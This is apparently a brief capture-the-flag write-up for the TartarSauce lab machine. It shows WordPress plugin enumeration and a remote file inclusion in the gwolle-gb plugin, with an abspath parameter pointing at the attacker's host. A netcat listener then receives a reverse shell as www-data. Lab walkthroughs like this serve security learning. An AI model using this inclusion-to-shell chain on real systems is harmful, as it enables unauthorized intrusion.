5 :80 monstra
# exploring the website
Logged In > System > Information > Directory Permissions
/var/www/html/webservices/monstra-3.0.4/storage Writable
/var/www/html/webservices/monstra-3.0.4/tmp Writable
/var/www/html/webservices/monstra-3.0.4/backups Writable
/var/www/html/webservices/monstra-3.0.4/public Writable
/var/www/html/webservices/monstra-3.0.4/plugins Writable
/var/www/html/webservices/monstra-3.0.4/admin Writable
# running aggressive plugin scan
[+] gwolle-gb
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
| [!] The version is out of date, the latest version is 4.1.2
| Version: 2.3.10 (100% confidence)
Using https://www.exploit-db.com/exploits/38861
# page requests for /wp-load.php and executes it.
10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.5/
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.88] 40762
SOCKET: Shell has connected! PID: 1854
whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
TartarSauce
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
Last updated